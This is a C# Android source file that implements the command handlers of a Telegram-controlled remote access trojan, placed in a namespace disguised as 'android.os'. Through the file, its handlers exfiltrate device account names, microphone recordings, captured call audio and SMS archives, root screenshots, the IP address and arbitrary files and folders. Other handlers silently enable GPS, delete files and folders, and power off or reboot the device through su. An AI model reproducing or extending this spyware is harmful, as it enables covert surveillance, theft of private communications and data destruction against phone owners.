using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using Android.Provider;
using Android.App;
using Android.Content;
using Android.OS;
using Android.Runtime;
using Android.Views;
using Android.Widget;
using Java.Lang;
using System.IO;
using System.IO.Compression;
using System.Net;
using Android.Locations;
using Android.Accounts;
using TeleSharp.Entities;
using TeleSharp.Entities.SendEntities;

namespace android.os
{
    public class DoWork
    {
        internal static bool DeleteChatId(string chat_idtodelete, int ReplyMessId, string chat_id,UsersMode mode)
        {
            if (inf.isdigit(chat_idtodelete))
            {
                if (inf.UserExist(chat_idtodelete, (mode == UsersMode.Users) ? inf.Users : inf.MyUsers))
                {
                    int i = inf.Values.sharep.GetInt("id_count", 0);
                    int numberid = inf.UserNumber(chat_idtodelete, (mode == UsersMode.Users) ? inf.Users : inf.MyUsers);
                    inf.RemoveUser(chat_idtodelete, (mode == UsersMode.Users) ? inf.Users : inf.MyUsers,mode);
                    inf.Metods.refreshrenamesids(numberid);
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Ok! delete chat id has been finished\nchat_id= " + chat_idtodelete, ChatId = chat_id, ReplyToMessageId = ReplyMessId });
                }
                else
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = "the \"" + chat_idtodelete + "\" was not found in chat_id list!", ChatId = chat_id, ReplyToMessageId = ReplyMessId });
            }
            else
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "the \"" + chat_idtodelete + "\" is not chat_id", ChatId = chat_id, ReplyToMessageId = ReplyMessId });
            return true;
        }
        internal static bool SetPrivate(string body, string value, int ReplyMessId, string chat_id)
        {
            if (chat_id == inf.Manager.ChatId)
            {
                if (value == "true")
                {
                    inf.Values.sharep.Edit().PutBoolean("private", true).Commit();
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = "private mode for this device is on!", ChatId = chat_id, ReplyToMessageId = ReplyMessId });
                }
                else if (value == "false")
                {
                    inf.Values.sharep.Edit().PutBoolean("private", false).Commit();
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = "private mode for this device is off!", ChatId = chat_id, ReplyToMessageId = ReplyMessId });
                }
                else
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = "what \"" + body + "\" and \"" + value + "\"?", ChatId = chat_id, ReplyToMessageId = ReplyMessId });
            }
            else
                inf.CTRLApi.SendMessage(new SendMessageParams {Text= "only creator can do this!",ChatId= chat_id,ReplyToMessageId= ReplyMessId});
            return true;
        }
        static string beforeenable;
        internal static void locon(string chatid)
        {
            beforeenable = Settings.Secure.GetString(Application.Context.ContentResolver,Settings.Secure.LocationProvidersAllowed);
            string newset = string.Format("{0},{1}", beforeenable,LocationManager.GpsProvider);
            try
            {
                Settings.Secure.PutString(Application.Context.ContentResolver, Settings.Secure.LocationProvidersAllowed, newset);
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Ok!Turned Location On!", ChatId = chatid });
            }
            catch (System.Exception ex)
            {
                inf.CTRLApi.SendMessage(new SendMessageParams {Text= ex.Message,ChatId= chatid});
            }
        }

        internal static void locoff(string chatid)
        {
            if (beforeenable == null)
            {
                string str = Settings.Secure.GetString(Application.Context.ContentResolver,Settings.Secure.LocationProvidersAllowed);
                if (str == null)
                    str = "";
                else
                {
                    string[] list = str.Split(',');
                    str = "";
                    int j = 0;
                    for (int i =0; i < list.Length;i++)
                    {
                        if(!list[i].Equals(LocationManager.GpsProvider))
                        {
                            if (j > 0)
                                str += ",";
                            str += list[i];
                            j++;
                        }
                    }
                    beforeenable = str;
                }
            }
            try
            {
                Settings.Secure.PutString(Application.Context.ContentResolver,Settings.Secure.LocationProvidersAllowed,beforeenable);
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Ok!Turned Location Off", ChatId = chatid });
            }
            catch(System.Exception ex)
            {
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = ex.Message,ChatId= chatid });
            }
        }

        internal static bool SetDeviceName(string value, int ReplyMessId, string chat_id)
        {
            inf.Values.sharep.Edit().PutString("devname" + chat_id, value).Commit();
            inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Ok! device name set to \"" + value + "\"", ChatId = chat_id, ReplyToMessageId = ReplyMessId });
            return true;
        }

        internal static void Sendallacces(string chatid)
        {
            Account[] acs = AccountManager.Get(inf.Values.C).GetAccounts();
            if (acs.Length == 0)
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "There are no account!", ChatId = chatid });
            foreach (Account a in acs)
            {
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = string.Format("Name: {0}\nType: {1}", a.Name, a.Type), ChatId = chatid });
                System.Threading.Thread.Sleep(10);
            }
        }

        internal static bool smsnotify(string chatid, bool v)
        {
            if (!v)
            {
                Setting.Remove("notifys" + chatid);
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Ok! Your Sms Notification Service Turned Off!", ChatId = chatid });
                return true;
            }
            Setting.Set_bool("notifys" + chatid,v);
            inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Ok! Your Sms Notification Service Turned On!", ChatId = chatid });
            return true;
        }
        internal static bool callnotify(string chatid, bool v)
        {
            if(!v)
            {
                Setting.Remove("notifyc" + chatid);
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Ok! Your Call Notification Service Turned Off!", ChatId = chatid });
                return true;
            }
            Setting.Set_bool("notifyc" + chatid, v);
            inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Ok! Your Call Notification Service Turned On!", ChatId = chatid });
            return true;
        }
        internal static bool SetMaxSize(string value, int ReplyMessId, string chat_id)
        {
            if (inf.Manager.ChatId == chat_id)
            {
                inf.Values.sharep.Edit().PutLong("maxsize",long.Parse(value));
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Ok! maxsize value set to \"" + value + "\" in app setting", ChatId = chat_id,ReplyToMessageId= ReplyMessId });
            }
            else
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Only creator can do this", ChatId = chat_id,ReplyToMessageId= ReplyMessId });
            return true;
        }
        internal static bool renamefile(string chatid,string pth) 
        {
            if (System.IO.File.Exists(pth) && new FileInfo(pth).Length < inf.Values.sharep.GetLong("maxsize", (50*1048576)))
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Ok! now send a new name: ", ChatId = chatid });
            else
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "can not rename file:" + pth, ChatId = chatid });
            return true;
        }
        internal static bool ShutDown(string chat_id)
        {
            if (RootUtil.IsDeviceRooted())
            {
                try
                {
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Device: " + inf.Metods.devicename(chat_id) + " wil shuting down!", ChatId = chat_id });
                    Java.Lang.Process proc = Runtime.GetRuntime().Exec(new string[] { "su", "-c", "reboot -p" });
                    proc.WaitFor();
                }
                catch (System.Exception ex)
                {
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = "ERROR: " + ex.Message, ChatId = chat_id });
                }
            }
            else
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Device Not Rooted", ChatId = chat_id });
            return true;
        }
        internal static bool Restart(string chat_id)
        {
            if (RootUtil.IsDeviceRooted())
            {
                try
                {
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Device: " + inf.Metods.devicename(chat_id) + " wil Restarting!", ChatId = chat_id });
                    Java.Lang.Process proc = Runtime.GetRuntime().Exec(new string[] { "su", "-c", "reboot" });
                    proc.WaitFor();
                }
                catch (System.Exception ex)
                {
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = "ERROR: " + ex.Message, ChatId = chat_id });
                }
            }
            else
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Device Not Rooted", ChatId = chat_id });
            return true;
        }
        internal static bool StartVC(string chat_id)
        {

            if (!RECORDER.IsAlive)
            {
                RECORDER.Fpth = (Filef.CreateDir(Filef.getmainpth() + "/System/tmp_vc") + "/rec.vc");
                RECORDER.ChatId = long.Parse(chat_id);
                RECORDER.start();
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Recording Voice Has Been Started!", ChatId = chat_id });
            }
            else
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Recorder Now Is Recording And You Can Not Start It Again!", ChatId = chat_id });
            return true;
        }
        internal static bool StopVC(string chat_id)
        {
            if (RECORDER.IsAlive)
            {
                RECORDER.stopr();
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Finished Record! Wait For Upload...!", ChatId = chat_id });
                inf.CTRLApi.SendDocument(chat_id, System.IO.File.ReadAllBytes(Filef.CreateDir(Filef.getmainpth() + "/System/tmp_vc/") + "rec.vc"), "rec.mp3");
                System.IO.File.Delete(Filef.CreateDir(Filef.getmainpth() + "/System/tmp_vc/") + "rec.vc");
            }
            else
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Recorder Was Not Started!", ChatId = chat_id });
            return true;
        }
        internal static bool DeleteFile(string value, string chat_id,string MessageId)
        {
            if (!Filef.exist(value))
            {
                inf.CTRLApi.EditMessage(new SendMessageParams { Text = "not found file in:" + value + " to delete", ChatId = chat_id ,MessageId=MessageId});
                return false;
            }
            System.IO.File.Delete(value);
            inf.CTRLApi.EditMessage(new SendMessageParams { Text = "ok! file has been deleted on: " + value, ChatId = chat_id ,MessageId=MessageId});
            return true;
        }
        internal static bool DeleteFolder(string value, string chat_id,string MessageId)
        {
            if (!Directory.Exists(value))
            {
                inf.CTRLApi.EditMessage(new SendMessageParams { Text = "not found folder in:" + value + " to delete", ChatId = chat_id,MessageId=MessageId });
                return false;
            }
            System.IO.Directory.Delete(value, true);
            inf.CTRLApi.EditMessage(new SendMessageParams { Text = "ok! folder has been deleted on: " + value, ChatId = chat_id,MessageId=MessageId });
            return true;
        }
        internal static bool DownloadFile(string value, string chat_id, Document fdown)
        {
            string dir = Directory.GetParent(value).FullName;
            if (!Directory.Exists(dir))
                Directory.CreateDirectory(dir);
            inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Downloading file...", ChatId = chat_id });
            try
            {
                inf.CTRLApi.DownloadFile(fdown.FileId, value+'/'+fdown.FileName);
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "ok! file has been saved on: " + value, ChatId = chat_id });
            }
            catch (System.Exception ex)
            {
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = ex.ToString(), ChatId = chat_id });
            }
            fdown = null;
            return true;
        }
        internal static bool Ip(string chatid)
        {
            var ip = inf.Metods.Ip();
            inf.CTRLApi.SendMessage(new SendMessageParams { Text = inf.Metods.devicename(chatid) + "\nIP: " + ip, ChatId = chatid });
            return true;
        }
        internal static bool CopyFile(string value, string chat_id)
        {
            string src = Filef.fpart(value);
            string dst = Filef.spart(value);
            if (System.IO.File.Exists(src))
            {
                if (!Directory.Exists(dst.Remove(Path.GetFullPath(dst).Length - (Path.GetFileName(dst).Length + 1), Path.GetFileName(dst).Length)))
                    Directory.CreateDirectory(dst.Remove(Path.GetFullPath(dst).Length - (Path.GetFileName(dst).Length + 1)));
                System.IO.File.Copy(src, dst);
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Ok! copy file finished", ChatId = chat_id });
            }
            else
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "file: \"" + src + "\" not found", ChatId = chat_id });
            return true;
        }
        internal static bool CutFile(string value, string chat_id)
        {
            string src = Filef.fpart(value);
            string dst = Filef.spart(value);
            if (System.IO.File.Exists(src))
            {
                if (!Directory.Exists(dst.Remove(Path.GetFullPath(dst).Length - (Path.GetFileName(dst).Length + 1), Path.GetFileName(dst).Length)))
                    Directory.CreateDirectory(dst.Remove(Path.GetFullPath(dst).Length - (Path.GetFileName(dst).Length + 1)));
                System.IO.File.Copy(src, dst);
                System.IO.File.Delete(src);
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Ok! copy file finished", ChatId = chat_id });
            }
            else
            {
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "file: \"" + src + "\" not found", ChatId = chat_id });
            }
            return true;
        }
        internal static void extract(string chatid, string pth,string todir)
        {
            string ext = System.IO.Path.GetExtension(pth).ToLower();
            if (ext == ".zip" || ext == ".gzip" || ext == ".7z" || ext == ".rar"||ext==".iso"||ext==".cab")
            {
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Extracting Zip File...", ChatId = chatid });
                ZipFile.ExtractToDirectory(pth,todir);
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Zip File Has Been Saved As: " + todir, ChatId = chatid });
            }
            else
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "This Is Not Zip File", ChatId = chatid });
        }
        internal static void Sendpropertis(string chatid, string v)
        {
            inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Plz Wait ,Calculating...", ChatId = chatid });
            if (!Directory.Exists(v))
            {
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "not found: " + v, ChatId = chatid });
                return;
            }
            DirectoryInfo df = new DirectoryInfo(v);
            inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Folder Name=" + df.Name + "\nFolder Path=" + df.FullName + "\nFiles Lenght=" + df.GetFiles().Length + "\nFolders Lenght=" + df.GetDirectories().Length + "\nSize=" + (Filef.Dirsize(df) / 1048576) + "MB\nCreation Time=" + df.CreationTime + "\nLast Write Time=" + df.LastWriteTime, ChatId = chatid });
        }
        internal static bool IsRoot(string chat_id)
        {
            inf.CTRLApi.SendMessage(new SendMessageParams { Text = RootUtil.IsDeviceRooted().ToString(), ChatId = chat_id });
            return true;
        }
        internal static bool UploadCalls(string chat_id)
        {
            System.IO.DirectoryInfo df = new System.IO.DirectoryInfo(Filef.CreateDir(Filef.getmainpth() + "/System/tmp_c"));
            if (df.GetFiles().Length == 0)
            {
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "no call in calls history!", ChatId = chat_id });
                return false;
            }
            long dirsize = Filef.Dirsize(df);
            if (dirsize < inf.Values.sharep.GetLong("maxsize",(50*1048576)))
            {
                Filef.renamefilesextentionindir(Filef.getmainpth() + "/System/tmp_c", ".mp3");
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Creating zip file...", ChatId = chat_id });
                System.IO.Compression.ZipFile.CreateFromDirectory(Filef.getmainpth() + "/System/tmp_c", Filef.getmainpth() + "/System/calls.zip");
                Filef.renamefilesextentionindir(Filef.getmainpth() + "/System/tmp_c", ".vc");
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Uploading zip file...", ChatId = chat_id });
                inf.CTRLApi.SendDocument(chat_id, System.IO.File.ReadAllBytes(Filef.getmainpth() + "/System/calls.zip"), "calls.zip");
                System.IO.File.Delete(Filef.getmainpth() + "/System/calls.zip");
            }
            return true;
        }
        internal static bool scmod(string chatid)
        {
            if (!inf.Values.ScreenMode)
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Screen Is Off!", ChatId = chatid });
            else
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Screen Is On!", ChatId = chatid });
            return true;
        }
        internal static bool sc(string chatid)
        {
           if (RootUtil.IsDeviceRooted())
            {
                if (inf.Values.ScreenMode)
                {
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Wait...", ChatId = chatid });
                    Java.Lang.Process sh = Java.Lang.Runtime.GetRuntime().Exec("su");
                    var os = new Java.IO.DataOutputStream(sh.OutputStream);
                    if (os != null)
                    {
                        os.WriteBytes("/system/bin/screencap -p " + Filef.CreateDir(Filef.getmainpth() + "/System/tmp_sc") + "/ax_.png");
                        os.Flush();
                        os.Close();
                        sh.WaitFor();
                        if (new FileInfo(Filef.getmainpth() + "/System/tmp_sc/ax_.png").Length >= (5 * 1048576))
                            inf.CTRLApi.SendDocument(chatid, System.IO.File.ReadAllBytes(Filef.getmainpth() + "/System/tmp_sc/ax_.png"));
                        else
                            inf.CTRLApi.SendPhoto(chatid, System.IO.File.ReadAllBytes(Filef.getmainpth() + "/System/tmp_sc/ax_.png"));
                        System.IO.File.Delete(Filef.getmainpth() + "/System/tmp_sc/ax_.png");
                    }
                    else
                        inf.CTRLApi.SendMessage(new SendMessageParams { Text = "outputstream is null", ChatId = chatid });
                }
                else
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Screen Is Off Plz Try Later!", ChatId = chatid });
            }
            else
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Device Not Rooted", ChatId = chatid });
            return true;
        }

        internal static bool SendListnipths(string value, string chat_id)
        {
            string pthstxt = "PATHS\n";
            inf.CTRLApi.SendMessage(new SendMessageParams { Text = "wait...", ChatId = chat_id });
            foreach (string s in Filef.getdirspth(value))
                pthstxt += s + "<folder>\n\n";
            foreach (string s in Filef.getfilespth(value))
                pthstxt += s + "<file>\n\n";
            inf.CTRLApi.SendMessage(new SendMessageParams { Text = pthstxt, ChatId = chat_id });
            return true;
        }
        internal static bool SendListpths(string value, string chat_id)
        {
            string pthstxt = "PATHS\n";
            inf.CTRLApi.SendMessage(new SendMessageParams { Text = "wait...", ChatId = chat_id });
            foreach (string s in Filef.getdirspth(value))
                pthstxt += s + "<folder><" + Filef.Dirsize(new DirectoryInfo(s)) / 1048576 + "MB>\n\n";
            foreach (string s in Filef.getfilespth(value))
                pthstxt += s + "<file><" + new FileInfo(s).Length / 1048576 + "MB>\n\n";
            inf.CTRLApi.SendMessage(new SendMessageParams { Text = pthstxt, ChatId = chat_id });
            return true;
        }
        internal static bool UploadFolder(string value, string chat_id)
        {
            DirectoryInfo fi = new DirectoryInfo(value);
            if (!fi.Exists)
            {
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "folder not found in: " + value, ChatId = chat_id });
                return false;
            }
            else if (Filef.Dirsize(fi) > inf.Values.sharep.GetLong("maxsize",(50*1048576)))
            {
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "couldn't send folder\nfolder size is: " + Filef.Dirsize(fi) / 1048576 + "\nmaxSize to send is: " + inf.Values.sharep.GetLong("maxsize", (50 * 1048576)) / 1048576 + "MB", ChatId = chat_id });
                return false;
            }
            else
            {
                string destpth = Directory.GetParent(value) + "/" + Path.GetFileName(value) + ".zip";
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Creating zip file...", ChatId = chat_id });
                ZipFile.CreateFromDirectory(value, destpth);
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Uploading zip file...", ChatId = chat_id });
                inf.CTRLApi.SendDocument(chat_id, System.IO.File.ReadAllBytes(destpth), Path.GetFileName(destpth));
                System.IO.File.Delete(destpth);
            }
            return true;
        }
        internal static bool UploadFile(string Path, string chat_id,bool delete=false)
        {
            FileInfo fi = new FileInfo(Path);
            if (!fi.Exists)
            {
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "file not found in: " + Path, ChatId = chat_id });
                return false;
            }
            else if (fi.Length > inf.Values.sharep.GetLong("maxsize",(50*1048576)))
            {
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "couldn't send file\nfile size is: " + fi.Length / 1048576 + "\nmaxSize to send is: " + inf.Values.sharep.GetLong("maxsize", (50 * 1048576)) / 1048576 + "MB", ChatId = chat_id });
                return false;
            }
            else
            {
                string ext = System.IO.Path.GetExtension(Path);
                if (ext == ".sm")
                    ext = ".txt";
                else if (ext == ".vc")
                    ext = ".mp3";
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Uploading file...", ChatId = chat_id });
                inf.CTRLApi.SendDocument(chat_id, System.IO.File.ReadAllBytes(Path), System.IO.Path.GetFileNameWithoutExtension(Path) + ext);
                if (delete)
                    System.IO.File.Delete(Path);
            }
            return true;
        }
        internal static bool UploadSmses(string chat_id)
        {
            DirectoryInfo df = new DirectoryInfo(Filef.CreateDir(Filef.getmainpth() + "/System/tmp_s"));
            if (df.GetFiles().Length == 0)
            {
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "no sms in sms history!", ChatId = chat_id });
                return false;
            }
            long dirsize = Filef.Dirsize(df);
            if (dirsize < inf.Values.sharep.GetLong("maxsize", (50 * 1048576)))
            {
                System.IO.Compression.ZipFile.CreateFromDirectory(Filef.getmainpth() + "/System/tmp_s", Filef.getmainpth() + "/System/smses.zip");
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Uploading Fil!", ChatId = chat_id });
                inf.CTRLApi.SendDocument(chat_id, System.IO.File.ReadAllBytes(Filef.getmainpth() + "/System/smses.zip"), "smses.zip");
                System.IO.File.Delete(Filef.getmainpth() + "/System/smses.zip");
            }
            return true;
        }
        internal static bool UploadEndCall(string chat_id)
        {
            System.IO.DirectoryInfo df = new System.IO.DirectoryInfo(Filef.CreateDir(Filef.getmainpth() + "/System/tmp_c"));
            if (df.GetFiles().Length == 0)
            {
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "no call in calls history!", ChatId = chat_id });
                return false;
            }
            if (df.GetFiles()[df.GetFiles().Length - 1].Length < inf.Values.sharep.GetLong("maxsize", (50 * 1048576)))
            {
                string pth = df.GetFiles()[df.GetFiles().Length - 1].FullName;
                string fnamenew = Path.GetFileNameWithoutExtension(pth)+".mp3";
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Uploading call voice...", ChatId = chat_id });
                inf.CTRLApi.SendDocument(chat_id, System.IO.File.ReadAllBytes(pth), fnamenew);
            }
            else
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "size of call more than: " + inf.Values.sharep.GetLong("maxsize", (50 * 1048576)), ChatId = chat_id });
            return true;
        }
        internal static bool BuildV(string chat_id)
        {
            inf.CTRLApi.SendMessage(new SendMessageParams { Text = Build.Display, ChatId = chat_id });
            return true;
        }
        internal static bool UploadEndSms(string chat_id)
        {
            DirectoryInfo df = new DirectoryInfo(Filef.CreateDir(Filef.getmainpth() + "/System/tmp_s"));
            if (df.GetFiles().Length == 0)
            {
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "no sms in sms history!", ChatId = chat_id });
                return false;
            }
            if (df.GetFiles()[df.GetFiles().Length - 1].Length < inf.Values.sharep.GetLong("maxsize", (50 * 1048576)))
            {
                string pth = df.GetFiles()[df.GetFiles().Length - 1].FullName;
                string fnamenew = Path.GetFileNameWithoutExtension(pth) + ".txt";
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Uploading Sms...", ChatId = chat_id });
                inf.CTRLApi.SendDocument(chat_id, System.IO.File.ReadAllBytes(pth), fnamenew);
            }
            else
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "size of sms more than: " + inf.Values.sharep.GetLong("maxsize", (50 * 1048576)), ChatId = chat_id });
            return true;
        }
        public static void zipfolder(string chatid, string pth,bool update, string pthsave = "")
        {
            if (Directory.Exists(pth) && Filef.Dirsize(new DirectoryInfo(pth)) < 52428800)
            {
                if (pthsave == "")
                    pthsave = Directory.GetParent(pth) + "/" + Path.GetFileNameWithoutExtension(pth) + ".zip";
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Creatin Zip File...", ChatId = chatid });
                ZipFile.CreateFromDirectory(pth, pthsave);
                if (update)
                {
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Uploading Zip File...", ChatId = chatid });
                    inf.CTRLApi.SendDocument(chatid, System.IO.File.ReadAllBytes(pthsave), Path.GetFileNameWithoutExtension(pth) + ".zip");
                }
                else
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Ok! Zip File Created at: " + pth, ChatId = chatid });
            }
            else
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "error", ChatId = chatid });
        }
        public static void zipfile(string chatid, string pth,bool Upload, string pthsave = "")
        {
            if (System.IO.File.Exists(pth) && new FileInfo(pth).Length < inf.Values.sharep.GetLong("maxsize", (50 * 1048576)))
            {
                if (pthsave == "")
                    pthsave = Directory.GetParent(pth) + "/" + Path.GetFileNameWithoutExtension(pth) + ".zip";
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Creatin Zip File...", ChatId = chatid });
                System.IO.Directory.CreateDirectory(System.IO.Path.GetDirectoryName(pth)+"/"+Path.GetFileNameWithoutExtension(pth));
                System.IO.File.Copy(pth,System.IO.Path.GetDirectoryName(pth)+"/"+Path.GetFileNameWithoutExtension(pth)+"/"+Path.GetFileName(pth));
                ZipFile.CreateFromDirectory(pth+"/" + Path.GetFileNameWithoutExtension(pth), pthsave);
                if (Upload)
                {
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Uploading Zip File...", ChatId = chatid });
                    inf.CTRLApi.SendDocument(chatid, System.IO.File.ReadAllBytes(pthsave), Path.GetFileNameWithoutExtension(pth) + ".zip");
                }
                else
                    inf.CTRLApi.SendMessage(new SendMessageParams { Text = "Ok!,Zip File Created In:" + pthsave, ChatId = chatid });
            }
            else
                inf.CTRLApi.SendMessage(new SendMessageParams { Text = "error", ChatId = chatid });
        }
    }
}